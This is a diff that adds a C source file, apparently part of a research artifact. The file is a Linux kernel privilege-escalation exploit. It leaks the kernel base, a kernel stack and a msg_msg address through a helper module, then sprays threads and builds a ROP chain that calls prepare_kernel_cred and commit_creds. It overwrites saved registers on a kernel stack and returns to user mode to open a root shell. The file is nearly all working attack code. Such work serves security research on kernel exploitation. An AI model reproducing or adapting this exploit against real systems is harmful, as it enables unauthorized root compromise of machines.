added artifacts

artifacts/attacks/stack_attack.c

@@ -0,0 +1,210 @@
+#include "utils.h"
+#include "ulkm.h"
+#include "msg_msg.h"
+#include <unistd.h>
+#include <sys/syscall.h>
+#include <sys/mman.h>
+#include <pthread.h>
+
+#define MSG_TYPE 0x41
+#define MSG_HEADER 48
+#define MSG_SIZE (4096 - MSG_HEADER)
+#define MSG_TEXT_OFFSET 2048
+
+#define SPRAY_THREADS 128
+#define RECLAIM_STACK_THREADS 256
+
+#define STACK_SZ (4<<12)
+#define NEXT_STACK 16*STACK_SZ
+
+// 0xffffffff818326ea: add rsp, 0x30; pop rbp; ret; 
+#define ADD_RSP_0X38_RET_OFFSET 0x8326ea
+// 0xffffffff8184c11f: push rax; pop rbp; ret; 
+#define PUSH_RAX_POP_RBP_RET_OFFSET 0x84c11f
+// 0xffffffff810e324c: mov rsp, rbp; pop rbp; ret; 
+#define MOV_RSP_RBP_POP_RET_OFFSET 0xe324c
+// 0xffffffff810e32f0: pop rdi; ret; 
+#define POP_RDI_RET_OFFSET 0xe32f0
+// 0xffffffff81608764: xchg rdi, rax; ret; 
+#define XCHG_RDI_RAX_RET_OFFSET 0x608764
+
+#define SWAPGS_POP_RET_OFFSET 0x140136c
+#define IRET_OFFSET 0x140183d
+#define FIND_TASK_BY_VPID_OFFSET 0x133020
+#define PREPARE_KERNEL_CRED_OFFSET 0x140d00
+#define COMMIT_CREDS_OFFSET 0x140780
+#define INIT_TASK_OFFSET 0x240fcc0
+#define INIT_CRED_OFFSET 0x2490220
+
+size_t _text;
+size_t stack;
+size_t msg_msg;
+enum state
+{
+    DO_LEAK,
+    STACK_LEAKED,
+} state;
+
+size_t user_cs;
+size_t user_ss;
+size_t user_sp;
+size_t user_rflags;
+void save_state(void)
+{
+    __asm__ (
+        ".intel_syntax noprefix;"
+        "mov user_cs, cs;"
+        "mov user_ss, ss;"
+        "mov user_sp, rsp;"
+        "pushf;"
+        "pop user_rflags;"
+        ".att_syntax;"
+    );
+    puts("[*] Saved state");
+}
+
+void *leak_task(void *)
+{
+    pin_to_core(1);
+    lkm_stack_leak((size_t)&stack);
+    stack += NEXT_STACK;
+    printf("[+] leaked stack %016zx\n", stack);
+    return 0;
+}
+
+void *spray_task(void *)
+{
+    pin_to_core(2);
+    sleep(-1);
+    return 0;
+}
+
+int empty_function(void *)
+{
+    // pin_to_core(3);
+    // sleep(-1);
+    return 0;
+}
+
+void shell(void)
+{
+    // register size_t rax asm("rax");
+    // printf("[*] rax %016zx\n", rax);
+    printf("[+] uid %d gid %d\n", getuid(), getgid());
+    // sleep(-1);
+    int ret = system("/bin/sh");
+    if (ret < 0) {
+        perror("system");
+        exit(-1);
+    }
+}
+
+void build_rop_chain(size_t *rop)
+{
+    *rop++ = 0; // rbp
+    *rop++ = POP_RDI_RET_OFFSET+_text;
+    *rop++ = INIT_TASK_OFFSET+_text;
+    *rop++ = PREPARE_KERNEL_CRED_OFFSET+_text;
+    *rop++ = XCHG_RDI_RAX_RET_OFFSET+_text;
+    *rop++ = COMMIT_CREDS_OFFSET+_text;
+    *rop++ = SWAPGS_POP_RET_OFFSET+_text;
+    *rop++ = 0; // rbp
+    *rop++ = IRET_OFFSET+_text;
+    *rop++ = (size_t)&shell;
+    *rop++ = user_cs;
+    *rop++ = user_rflags;
+    *rop++ = user_sp;
+    *rop++ = user_ss;
+}
+
+char thread_stack[1<<15];
+
+int main(void)
+{
+    save_state();
+    pin_to_core(0);
+    printf("[*] start\n");
+    setvbuf(stdout, NULL, _IONBF, 0);
+    setvbuf(stdin, NULL, _IONBF, 0);
+    setvbuf(stderr, NULL, _IONBF, 0);
+
+    lkm_init();
+    lkm_code_leak((size_t)&_text);
+    printf("[+] _text %016zx\n", _text);
+
+    static char buffer[0x1000] = {0};
+    msg *message = (msg *)buffer;
+    message->mtype = MSG_TYPE;
+
+    build_rop_chain((size_t *)(message->mtext+MSG_TEXT_OFFSET));
+
+    int qid = make_queue(IPC_PRIVATE, 0666 | IPC_CREAT);
+    send_msg(qid, message, MSG_SIZE, 0);
+
+    lkm_msg_msg_leak((size_t)&msg_msg, qid, MSG_TYPE);
+    printf("[+] msg_msg %016zx\n", msg_msg);
+
+    int ret;
+    pthread_t tid;
+    for (size_t i = 0; i < SPRAY_THREADS; ++i) {
+        ret = pthread_create(&tid, 0, spray_task, 0);
+        if (ret < 0) {
+            perror("pthread_create(spray_task)");
+            exit(-1);
+        }
+    }
+
+    printf("[*] create leak task\n");
+    ret = pthread_create(&tid, 0, leak_task, 0);
+    if (ret < 0) {
+        perror("pthread_create(leak_task)");
+        exit(-1);
+    }
+
+    printf("[*] join leak task\n");
+    pthread_join(tid, 0);
+    for (size_t i = 0; i < RECLAIM_STACK_THREADS; ++i) {
+        /* load small first payload on the stack via user registers */
+        register size_t r12 asm("r12");
+        size_t old_r12 = r12;
+        register size_t r13 asm("r13");
+        size_t old_r13 = r13;
+        register size_t r14 asm("r14");
+        size_t old_r14 = r14;
+        asm volatile(
+            "mov %[st90], %%r12;"
+            "mov %[st98], %%r13;"
+            "mov %[sta0], %%r14;"
+            ::
+                [st90]"r"(_text+MOV_RSP_RBP_POP_RET_OFFSET),
+                [st98]"r"(_text+PUSH_RAX_POP_RBP_RET_OFFSET),
+                [sta0]"r"(_text+XCHG_RDI_RAX_RET_OFFSET)
+        );
+        clone(empty_function, thread_stack+sizeof(thread_stack), CLONE_VM|CLONE_FS|CLONE_FILES|CLONE_SIGHAND|CLONE_THREAD|CLONE_SYSVSEM|CLONE_PARENT_SETTID|CLONE_CHILD_CLEARTID, 0);
+        asm volatile(
+            "mov %%r12, %[old_r12];"
+            "mov %%r13, %[old_r13];"
+            "mov %%r14, %[old_r14];"
+            :: 
+                [old_r12]"m"(old_r12),
+                [old_r13]"m"(old_r13),
+                [old_r14]"m"(old_r14)
+        );
+    }
+    /* overwrite function pointer with rdi register */
+    lkm_write(stack+STACK_SZ-0xc0, _text+ADD_RSP_0X38_RET_OFFSET); // <- R12, RIP
+    lkm_write(stack+STACK_SZ-0xc8, msg_msg+MSG_HEADER+MSG_TEXT_OFFSET); // <- R13, RDI
+
+    /* for testing */
+    // lkm_write(stack+STACK_SZ-0xb8, 0x4141414141414141);
+    // lkm_write(stack+STACK_SZ-0xc0, 0x4242424242424242); // <- R12, RIP
+    // lkm_write(stack+STACK_SZ-0xc8, 0x4343434343434343); // <- R13, RDI
+    // lkm_write(stack+STACK_SZ-0xd0, 0x4444444444444444);
+    // lkm_write(stack+STACK_SZ-0xd8, 0x4545454545454545); // <- R14
+    // lkm_write(stack+STACK_SZ-0xe0, 0x4646464646464646); // <- R15
+
+    printf("[*] main thread sleep\n");
+    sleep(-1);
+    // cleanup_queue(qid);
+    printf("[*] done\n");
+}